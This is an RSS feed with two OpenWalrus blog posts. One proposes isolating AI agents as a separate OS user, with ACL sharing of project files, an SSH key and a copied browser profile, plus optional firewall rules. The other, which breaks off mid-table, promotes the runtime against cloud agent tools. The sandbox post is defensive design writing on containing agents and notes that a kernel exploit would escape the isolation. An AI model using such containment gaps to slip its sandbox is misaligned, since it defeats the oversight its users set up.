<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: CrabTalk</title>
    <description>The latest articles on Forem by CrabTalk (@crabtalk).</description>
    <link>https://forem.com/crabtalk</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Forganization%2Fprofile_image%2F12670%2F193db0b4-577b-4751-b7d8-4fc5428ae2b4.png</url>
      <title>Forem: CrabTalk</title>
      <link>https://forem.com/crabtalk</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/crabtalk"/>
    <language>en</language>
    <item>
      <title>Workspace as sandbox: a simpler model for agent isolation</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:56:31 +0000</pubDate>
      <link>https://forem.com/crabtalk/workspace-as-sandbox-a-simpler-model-for-agent-isolation-33pd</link>
      <guid>https://forem.com/crabtalk/workspace-as-sandbox-a-simpler-model-for-agent-isolation-33pd</guid>
      <description>&lt;p&gt;The &lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;sandbox survey&lt;/a&gt; found that every&lt;br&gt;
production agent system either gates individual commands (Claude Code,&lt;br&gt;
Cursor, Codex CLI) or gates the environment (Devin, OpenHands). Both&lt;br&gt;
have real tradeoffs. Per-command approval interrupts flow. Container&lt;br&gt;
isolation cuts agents off from the host resources that make them useful&lt;br&gt;
— especially authenticated browser sessions.&lt;/p&gt;

&lt;p&gt;There's a third option hiding in the operating system itself: &lt;strong&gt;make the&lt;br&gt;
agent a real OS user, and keep the runtime completely unaware of it.&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;
  
  
  The model
&lt;/h2&gt;

&lt;p&gt;One system user — &lt;code&gt;walrus&lt;/code&gt; — is the agent's identity. All agents, all&lt;br&gt;
tasks, all workspaces live under this user's home directory. The walrus&lt;br&gt;
runtime runs as this user. Standard Unix file permissions enforce the&lt;br&gt;
boundary. No Landlock, no seccomp, no sandbox library in the runtime&lt;br&gt;
code. Zero lines of sandbox logic.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/workspace-sandbox-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The human user (&lt;code&gt;alice&lt;/code&gt;) decides what the agent can see by setting ACLs&lt;br&gt;
on her own files or copying resources into the workspace's &lt;code&gt;shared/&lt;/code&gt;&lt;br&gt;
directory. The agent can't read anything outside its home unless &lt;code&gt;alice&lt;/code&gt;&lt;br&gt;
explicitly grants access. This isn't a new abstraction — it's how Unix&lt;br&gt;
has worked since the 1970s.&lt;/p&gt;
&lt;h2&gt;
  
  
  Why zero sandbox logic in the runtime
&lt;/h2&gt;
&lt;h3&gt;
  
  
  The sandbox is the OS, not the code
&lt;/h3&gt;

&lt;p&gt;Claude Code, Cursor, and Codex CLI all embed sandbox logic in their&lt;br&gt;
runtimes — generating Seatbelt profiles, configuring Landlock rules,&lt;br&gt;
writing seccomp BPF programs. This means maintaining three platform-&lt;br&gt;
specific implementations, debugging sandbox policy issues, and&lt;br&gt;
accepting the security risk of bugs in their own sandbox code.&lt;/p&gt;

&lt;p&gt;The OS user model sidesteps all of this. The runtime doesn't know or&lt;br&gt;
care about sandboxing. It runs as &lt;code&gt;walrus&lt;/code&gt;, and the OS handles isolation.&lt;br&gt;
File permissions, process ownership, resource limits — these are kernel-&lt;br&gt;
enforced mechanisms that have been audited for decades. No sandbox code&lt;br&gt;
to write means no sandbox bugs to ship.&lt;/p&gt;
&lt;h3&gt;
  
  
  Cross-platform for free
&lt;/h3&gt;

&lt;p&gt;Unix file permissions work identically on macOS, Linux, and every BSD.&lt;br&gt;
No platform-specific sandbox implementation to maintain. No Seatbelt on&lt;br&gt;
macOS, Landlock on Linux, WSL2 workarounds on Windows. The same model,&lt;br&gt;
the same commands, the same behavior everywhere.&lt;/p&gt;
&lt;h3&gt;
  
  
  Pluggable setup, not pluggable runtime
&lt;/h3&gt;

&lt;p&gt;The sandbox setup — creating the user, configuring firewall rules,&lt;br&gt;
setting ACLs — is a one-time operation that happens outside the runtime.&lt;br&gt;
This makes it &lt;strong&gt;pluggable by design&lt;/strong&gt;: &lt;code&gt;walrus sandbox init&lt;/code&gt; is just a&lt;br&gt;
command that wraps the platform-specific setup steps. Anyone can write&lt;br&gt;
their own init script, customize the user configuration, add network&lt;br&gt;
rules, or skip the whole thing. The runtime doesn't change.&lt;/p&gt;
&lt;h2&gt;
  
  
  &lt;code&gt;walrus sandbox init&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;A single command that sets up the OS user and workspace structure.&lt;br&gt;
Requires sudo once, then never again.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox init
&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; password &lt;span class="k"&gt;for &lt;/span&gt;alice:
Creating system user &lt;span class="s1"&gt;'walrus'&lt;/span&gt;...
  macOS: sysadminctl &lt;span class="nt"&gt;-addUser&lt;/span&gt; _walrus &lt;span class="nt"&gt;-home&lt;/span&gt; /var/walrus &lt;span class="nt"&gt;-shell&lt;/span&gt; /bin/bash
  Linux: useradd &lt;span class="nt"&gt;--system&lt;/span&gt; &lt;span class="nt"&gt;--home&lt;/span&gt; /var/walrus &lt;span class="nt"&gt;--shell&lt;/span&gt; /bin/bash walrus
Creating home directory /var/walrus/
Creating /var/walrus/workspaces/
Creating /var/walrus/.runtimes/
Done. All walrus agents will now run as user &lt;span class="s1"&gt;'walrus'&lt;/span&gt;&lt;span class="nb"&gt;.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. No LaunchDaemon, no systemd unit, no firewall rules by&lt;br&gt;
default. The init command does the minimum: create the user, create the&lt;br&gt;
home directory. Everything else is optional and additive.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;&lt;a href="https://openwalrus.xyz/blog/workspace-sandbox-design" rel="noopener noreferrer"&gt;Diagram — see original post&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h3&gt;
  
  
  What init does NOT do
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;No network firewall rules (opt-in via &lt;code&gt;walrus sandbox network init&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;No runtime service/daemon installation (opt-in via &lt;code&gt;walrus sandbox service init&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;No Chrome profile copying (the user does this manually or via a share command)&lt;/li&gt;
&lt;li&gt;No Landlock/seccomp/Seatbelt configuration (the OS user &lt;em&gt;is&lt;/em&gt; the sandbox)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Each of these is a separate, optional command. The runtime works the&lt;br&gt;
same regardless of which you've run. This is the&lt;br&gt;
&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;less code, more skills&lt;/a&gt; principle applied&lt;br&gt;
to infrastructure: the runtime is minimal, the setup is extensible.&lt;/p&gt;
&lt;h3&gt;
  
  
  Without init
&lt;/h3&gt;

&lt;p&gt;If the user never runs &lt;code&gt;walrus sandbox init&lt;/code&gt;, the runtime runs as the&lt;br&gt;
current user — same as Claude Code or Aider today. No isolation, no&lt;br&gt;
friction. The sandbox is purely opt-in. The runtime code path is&lt;br&gt;
identical either way.&lt;/p&gt;
&lt;h2&gt;
  
  
  Sharing host resources
&lt;/h2&gt;

&lt;p&gt;The human user and the agent need to exchange files. The mechanisms&lt;br&gt;
depend on the resource type.&lt;/p&gt;
&lt;h3&gt;
  
  
  Project files: ACLs
&lt;/h3&gt;

&lt;p&gt;The user grants the &lt;code&gt;walrus&lt;/code&gt; user access to a project directory:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# macOS&lt;/span&gt;
&lt;span class="nb"&gt;chmod&lt;/span&gt; +a &lt;span class="s2"&gt;"walrus allow read,write,execute,delete,add_file,add_subdirectory"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    ~/projects/my-app

&lt;span class="c"&gt;# Linux&lt;/span&gt;
setfacl &lt;span class="nt"&gt;-R&lt;/span&gt; &lt;span class="nt"&gt;-m&lt;/span&gt; u:walrus:rwx ~/projects/my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;No root needed — the file owner sets ACLs on their own files. The agent&lt;br&gt;
reads and writes the project directory. &lt;code&gt;getfacl&lt;/code&gt; (Linux) or &lt;code&gt;ls -le&lt;/code&gt;&lt;br&gt;
(macOS) shows exactly what's shared.&lt;/p&gt;

&lt;p&gt;A convenience wrapper:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox share ~/projects/my-app
Granting walrus &lt;span class="nb"&gt;read&lt;/span&gt;/write access to /Users/alice/projects/my-app...
Done. The agent can now access this directory.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Credentials: read-only ACLs
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox share &lt;span class="nt"&gt;--read-only&lt;/span&gt; ~/.ssh/id_ed25519
Granting walrus read-only access to /Users/alice/.ssh/id_ed25519...
Done.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent can use the SSH key but can't modify or delete it.&lt;/p&gt;

&lt;h3&gt;
  
  
  Browser profiles: copy into workspace
&lt;/h3&gt;

&lt;p&gt;For resources that can't be safely shared concurrently, copy them:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox share &lt;span class="nt"&gt;--copy&lt;/span&gt; ~/.config/google-chrome/Profile&lt;span class="se"&gt;\ &lt;/span&gt;1 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--into&lt;/span&gt; workspaces/task-42/chrome-profile

Copying Chrome profile into /var/walrus/workspaces/task-42/chrome-profile/...
Using reflink &lt;span class="o"&gt;(&lt;/span&gt;copy-on-write&lt;span class="o"&gt;)&lt;/span&gt;... Done.

&lt;span class="c"&gt;# The agent launches Chrome with its own copy:&lt;/span&gt;
chrome &lt;span class="nt"&gt;--headless&lt;/span&gt; &lt;span class="nt"&gt;--user-data-dir&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;/var/walrus/workspaces/task-42/chrome-profile/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent starts with the user's session state (cookies, saved logins)&lt;br&gt;
but changes are isolated. Two agents get independent copies. On APFS&lt;br&gt;
(macOS) and Btrfs (Linux), &lt;code&gt;cp --reflink=auto&lt;/code&gt; makes this near-instant.&lt;/p&gt;
&lt;h3&gt;
  
  
  Listing and revoking
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox shared
/Users/alice/projects/my-app        read-write
/Users/alice/.ssh/id_ed25519        read-only
&lt;span class="o"&gt;(&lt;/span&gt;copied&lt;span class="o"&gt;)&lt;/span&gt; chrome-profile → task-42   isolated copy

&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox unshare ~/projects/my-app
Revoking walrus access to /Users/alice/projects/my-app...
Done.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;h2&gt;
  
  
  Where it breaks
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Network isolation is separate
&lt;/h3&gt;

&lt;p&gt;Unix file permissions don't restrict network access. The &lt;code&gt;walrus&lt;/code&gt; user&lt;br&gt;
can &lt;code&gt;curl&lt;/code&gt; anything by default. For network control, you need additional&lt;br&gt;
setup:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;walrus sandbox network init
Setting up per-user firewall rules &lt;span class="k"&gt;for &lt;/span&gt;walrus...
  Linux: iptables &lt;span class="nt"&gt;-A&lt;/span&gt; OUTPUT &lt;span class="nt"&gt;-m&lt;/span&gt; owner &lt;span class="nt"&gt;--uid-owner&lt;/span&gt; walrus &lt;span class="nt"&gt;-j&lt;/span&gt; DROP
  macOS: adding pf rule &lt;span class="k"&gt;for &lt;/span&gt;user _walrus
Default: deny all outbound. Configure allowlist &lt;span class="k"&gt;in&lt;/span&gt; ~/.walrus/network.toml
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is a separate, optional init step. The runtime doesn't enforce&lt;br&gt;
network policy — it delegates to the OS firewall. If the user hasn't&lt;br&gt;
run &lt;code&gt;walrus sandbox network init&lt;/code&gt;, network is unrestricted.&lt;/p&gt;
&lt;h3&gt;
  
  
  Process-level resources
&lt;/h3&gt;

&lt;p&gt;Some host resources aren't files. Display access, GPU, audio, D-Bus&lt;br&gt;
sessions — a separate OS user doesn't get these automatically.&lt;/p&gt;

&lt;p&gt;For headless browser automation (CDP), this is fine — headless Chrome&lt;br&gt;
doesn't need a display. For visual Computer Use, the user would need to&lt;br&gt;
grant display access:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# X11&lt;/span&gt;
xhost +SI:localuser:walrus

&lt;span class="c"&gt;# Or run a virtual framebuffer under the walrus user&lt;/span&gt;
Xvfb :99 &amp;amp;
&lt;span class="nb"&gt;export &lt;/span&gt;&lt;span class="nv"&gt;DISPLAY&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;:99
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is additional setup, not something the runtime handles.&lt;/p&gt;

&lt;h3&gt;
  
  
  The sudo prompt
&lt;/h3&gt;

&lt;p&gt;Creating an OS user requires root. Every developer tool that creates&lt;br&gt;
service accounts does this — Docker, Postgres, MySQL — but it's still&lt;br&gt;
a friction point for "download and run" tooling.&lt;/p&gt;

&lt;p&gt;The design makes this explicitly opt-in: &lt;code&gt;walrus sandbox init&lt;/code&gt; is a&lt;br&gt;
separate command, not part of &lt;code&gt;walrus install&lt;/code&gt;. Without it, walrus runs&lt;br&gt;
as the current user with no isolation. The sudo prompt only appears when&lt;br&gt;
the user actively chooses isolation.&lt;/p&gt;

&lt;h3&gt;
  
  
  Kernel isolation is shallow
&lt;/h3&gt;

&lt;p&gt;Like every other local sandbox approach (Landlock, Seatbelt, user&lt;br&gt;
namespaces), the OS user shares the host kernel. A kernel exploit&lt;br&gt;
escalates to root. For local developer tooling the threat model is&lt;br&gt;
"agent does something unintended" — acceptable. For multi-tenant&lt;br&gt;
platforms running untrusted agent code, not acceptable.&lt;/p&gt;

&lt;h2&gt;
  
  
  The design principle
&lt;/h2&gt;

&lt;p&gt;The walrus runtime has zero sandbox logic. The sandbox is the operating&lt;br&gt;
system. Setup is a pluggable command that runs once. Every &lt;code&gt;walrus sandbox share&lt;/code&gt;&lt;br&gt;
and &lt;code&gt;walrus sandbox unshare&lt;/code&gt; command is just a thin wrapper around &lt;code&gt;setfacl&lt;/code&gt; /&lt;br&gt;
&lt;code&gt;chmod +a&lt;/code&gt;. The runtime doesn't check ACLs, doesn't enforce policies,&lt;br&gt;
doesn't generate sandbox profiles. It runs as whatever user launched it&lt;br&gt;
— if that user is &lt;code&gt;walrus&lt;/code&gt;, isolation exists. If not, it doesn't.&lt;/p&gt;

&lt;p&gt;This means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No sandbox bugs in the runtime.&lt;/strong&gt; The attack surface is the OS kernel,
not our code.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No platform-specific code paths.&lt;/strong&gt; The same runtime binary works on
macOS and Linux.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;No configuration to get wrong.&lt;/strong&gt; The sandbox is either set up
(user exists) or it isn't. No SBPL profiles, no BPF programs, no
TOML policy files that the runtime interprets.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Full user control.&lt;/strong&gt; The human user decides what to share using
standard Unix tools. They can inspect, modify, or revoke permissions
at any time without touching the walrus runtime.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Prior art
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://github.com/webcoyote/sandvault" rel="noopener noreferrer"&gt;Sandvault&lt;/a&gt; is the clearest&lt;br&gt;
prior art — a macOS tool that creates a per-human-user agent account&lt;br&gt;
and runs commands via &lt;code&gt;ssh sandvault-$USER@localhost&lt;/code&gt;, adding Seatbelt&lt;br&gt;
restrictions on top.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://medium.com/nttlabs/alcoholless-a-lightweight-security-sandbox-for-macos-programs-homebrew-ai-agents-etc-ccf0d1927301" rel="noopener noreferrer"&gt;Alcoholless&lt;/a&gt;&lt;br&gt;
(NTT Labs) runs programs as a separate macOS user, syncing changed files&lt;br&gt;
back on exit.&lt;/p&gt;

&lt;p&gt;Both add runtime sandbox logic on top of the OS user. Our design&lt;br&gt;
intentionally doesn't — the OS user &lt;em&gt;is&lt;/em&gt; the entire sandbox layer.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;One walrus user or one per human user?&lt;/strong&gt; A single system-wide &lt;code&gt;walrus&lt;/code&gt;&lt;br&gt;
user is simpler. But on a shared machine, Alice's agent and Bob's agent&lt;br&gt;
would share a home directory. Per-human-user accounts (&lt;code&gt;walrus-alice&lt;/code&gt;,&lt;br&gt;
&lt;code&gt;walrus-bob&lt;/code&gt;) provide isolation but multiply setup complexity. Sandvault&lt;br&gt;
chose per-human-user. For a single-developer machine (the primary walrus&lt;br&gt;
use case), one user seems right.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should &lt;code&gt;walrus sandbox share&lt;/code&gt; wrap ACLs or teach ACLs?&lt;/strong&gt; A wrapper command is&lt;br&gt;
more convenient. But it hides what's happening, and users may not know&lt;br&gt;
how to debug permissions. An alternative: &lt;code&gt;walrus sandbox share&lt;/code&gt; prints the&lt;br&gt;
raw &lt;code&gt;setfacl&lt;/code&gt; / &lt;code&gt;chmod +a&lt;/code&gt; command and asks the user to run it. Full&lt;br&gt;
transparency, slightly more friction.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How do &lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;skills&lt;/a&gt; declare resource needs?&lt;/strong&gt;&lt;br&gt;
A skill that needs Chrome access could declare &lt;code&gt;needs: [browser]&lt;/code&gt; in its&lt;br&gt;
metadata. Before running the skill, the runtime checks whether a Chrome&lt;br&gt;
profile exists in the workspace. If not, it prompts: "This skill needs&lt;br&gt;
a browser profile. Run &lt;code&gt;walrus sandbox share --copy &amp;lt;path&amp;gt;&lt;/code&gt; to provide one."&lt;br&gt;
The runtime doesn't &lt;em&gt;enforce&lt;/em&gt; — it &lt;em&gt;informs&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is the no-sandbox fallback good enough?&lt;/strong&gt; Without &lt;code&gt;walrus sandbox init&lt;/code&gt;,&lt;br&gt;
the agent runs as the current user with full access. This matches Aider's&lt;br&gt;
model and what most developers do today. But it means the default is&lt;br&gt;
zero isolation. Should walrus warn on every run without sandbox init?&lt;br&gt;
Or is that the kind of nag that teaches users to ignore warnings?&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/agent-sandbox-permissions" rel="noopener noreferrer"&gt;Sandboxing AI agents: beyond Docker and WASM&lt;/a&gt;
— the survey this design responds to&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://github.com/webcoyote/sandvault" rel="noopener noreferrer"&gt;Sandvault&lt;/a&gt; — prior art for
OS-user-based agent sandboxing on macOS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://medium.com/nttlabs/alcoholless-a-lightweight-security-sandbox-for-macos-programs-homebrew-ai-agents-etc-ccf0d1927301" rel="noopener noreferrer"&gt;Alcoholless&lt;/a&gt;
— NTT Labs' separate-user sandbox for macOS&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://cursor.com/blog/agent-sandboxing" rel="noopener noreferrer"&gt;Cursor Agent Sandboxing&lt;/a&gt;
— data showing environmental sandboxing increases agent autonomy&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://openwalrus.xyz/blog/less-code-more-skills" rel="noopener noreferrer"&gt;Less code, more skills&lt;/a&gt;
— the extension model and why sandbox config belongs in skill metadata&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/workspace-sandbox-design" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>architecture</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>Why we built OpenWalrus</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:55:08 +0000</pubDate>
      <link>https://forem.com/crabtalk/why-we-built-openwalrus-5cmh</link>
      <guid>https://forem.com/crabtalk/why-we-built-openwalrus-5cmh</guid>
      <description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Update (v0.0.7):&lt;/strong&gt; Local LLM inference was removed in v0.0.7. OpenWalrus now connects to remote providers (OpenAI, Claude, DeepSeek, Ollama). Memory and search are now external WHS services. The architectural arguments below still apply to the composable design.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;AI agent runtimes are exploding in popularity. But the most widely-used open-source options share&lt;br&gt;
a set of problems that stem from one architectural decision: depending on cloud APIs for inference.&lt;/p&gt;

&lt;p&gt;We built OpenWalrus to prove there's a better way. Here's what's broken, and how local-first&lt;br&gt;
changes the equation.&lt;/p&gt;

&lt;h2&gt;
  
  
  The token tax
&lt;/h2&gt;

&lt;p&gt;Cloud-based agent runtimes send every request to an external API. Every tool call, every&lt;br&gt;
reasoning step, every heartbeat consumes tokens — and tokens cost money.&lt;/p&gt;

&lt;p&gt;The numbers are staggering:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Based on community reports, power users spend &lt;strong&gt;$200–3,600/month&lt;/strong&gt; in API bills from normal agent usage&lt;/li&gt;
&lt;li&gt;Workspace files alone can &lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;waste 93.5% of the token budget&lt;/a&gt;,
leaving only a fraction for actual work&lt;/li&gt;
&lt;li&gt;Scheduled tasks and heartbeats accumulate context across runs, burning tokens even when
the agent is idle — in one community report, heartbeats alone cost &lt;strong&gt;$50/day&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;A single stuck automation loop can &lt;a href="https://github.com/openclaw/openclaw/discussions/1949" rel="noopener noreferrer"&gt;run up hundreds of dollars overnight&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus runs LLM inference in-process.&lt;/strong&gt; A built-in model registry with 20+ curated models&lt;br&gt;
auto-selects the right model and quantization for your hardware. There are no API calls, no&lt;br&gt;
token metering, and no usage-based billing. You can run agents 24/7 without worrying about a bill.&lt;/p&gt;

&lt;h2&gt;
  
  
  Security by neglect
&lt;/h2&gt;

&lt;p&gt;When your agent runtime talks to external APIs, it needs credentials. When it exposes a web&lt;br&gt;
interface, it needs authentication. When it supports third-party plugins, it needs vetting.&lt;br&gt;
Most cloud agent runtimes fail at all three.&lt;/p&gt;

&lt;p&gt;The track record speaks for itself:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A &lt;a href="https://www.kaspersky.com/blog/openclaw-vulnerabilities-exposed/55263/" rel="noopener noreferrer"&gt;security audit found 512 vulnerabilities&lt;/a&gt;,
eight classified as critical&lt;/li&gt;
&lt;li&gt;Over &lt;a href="https://www.bitsight.com/blog/openclaw-ai-security-risks-exposed-instances" rel="noopener noreferrer"&gt;224,000 agent instances are publicly accessible&lt;/a&gt;
on the open internet, with ~30% having no authentication and ~60% showing leaked credentials&lt;/li&gt;
&lt;li&gt;API keys are &lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;stored in plaintext&lt;/a&gt;
with no encryption&lt;/li&gt;
&lt;li&gt;A one-click remote code execution vulnerability (&lt;a href="https://www.darkreading.com/application-security/critical-openclaw-vulnerability-ai-agent-risks" rel="noopener noreferrer"&gt;CVE-2026-25253&lt;/a&gt;)
allowed attackers to compromise instances via a single malicious link&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus exposes no network services by default.&lt;/strong&gt; There are no API keys to leak because&lt;br&gt;
built-in inference doesn't need them. There are no ports left open, no web dashboards to&lt;br&gt;
misconfigure, and no credentials stored in plaintext.&lt;/p&gt;

&lt;h2&gt;
  
  
  Setup shouldn't be a project
&lt;/h2&gt;

&lt;p&gt;Getting a cloud agent runtime running often requires Docker, a gateway service, a database,&lt;br&gt;
and careful configuration. The reality:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;Docker setup fails on fresh installations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Gateway services crash with &lt;code&gt;allowedOrigins&lt;/code&gt; errors on first startup&lt;/li&gt;
&lt;li&gt;Headless server deployments (EC2, VPS) fail due to display requirements&lt;/li&gt;
&lt;li&gt;The CLI is &lt;a href="https://github.com/openclaw/openclaw/discussions/26472" rel="noopener noreferrer"&gt;painfully slow on resource-constrained devices&lt;/a&gt;
like Raspberry Pi&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus is a single binary.&lt;/strong&gt; Download it, run it. No Docker, no gateway, no database,&lt;br&gt;
no multi-service orchestration. It works on a fresh machine with zero dependencies.&lt;/p&gt;

&lt;h2&gt;
  
  
  The plugin marketplace gamble
&lt;/h2&gt;

&lt;p&gt;Extensibility through community plugins sounds great in theory. In practice, it introduces&lt;br&gt;
supply-chain risk at scale:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Out of 10,700+ community-contributed skills, &lt;a href="https://www.malwarebytes.com/blog/news/2026/02/openclaw-what-is-it-and-can-you-use-it-safely" rel="noopener noreferrer"&gt;820+ were found to be malicious&lt;/a&gt; —
a number that grew rapidly from 324 just weeks earlier&lt;/li&gt;
&lt;li&gt;Plugins run with the same permissions as the agent itself, meaning a malicious plugin
has access to your files, credentials, and shell&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;OpenWalrus ships with core capabilities built in&lt;/strong&gt; — shell access, browser control, messaging&lt;br&gt;
channels, persistent memory. There's no marketplace to browse, no unvetted code to install,&lt;br&gt;
and no supply-chain attack surface.&lt;/p&gt;

&lt;h2&gt;
  
  
  How OpenWalrus is different
&lt;/h2&gt;

&lt;p&gt;Every design decision in OpenWalrus traces back to one principle: &lt;strong&gt;the agent runtime should&lt;br&gt;
be as simple and trustworthy as any other tool on your machine.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Problem&lt;/th&gt;
&lt;th&gt;OpenWalrus approach&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Token costs&lt;/td&gt;
&lt;td&gt;Built-in LLM inference — unlimited, free&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security vulnerabilities&lt;/td&gt;
&lt;td&gt;No network services, no credentials required&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Complex setup&lt;/td&gt;
&lt;td&gt;Single binary, zero dependencies&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Malicious plugins&lt;/td&gt;
&lt;td&gt;Core capabilities built in&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unreliable memory&lt;/td&gt;
&lt;td&gt;Persistent context that works out of the box&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Slow cold starts&lt;/td&gt;
&lt;td&gt;Under 10 ms — runtime starts instantly, models load async&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Manual model setup&lt;/td&gt;
&lt;td&gt;Auto-detected from hardware — 20+ curated models, auto-quantization&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
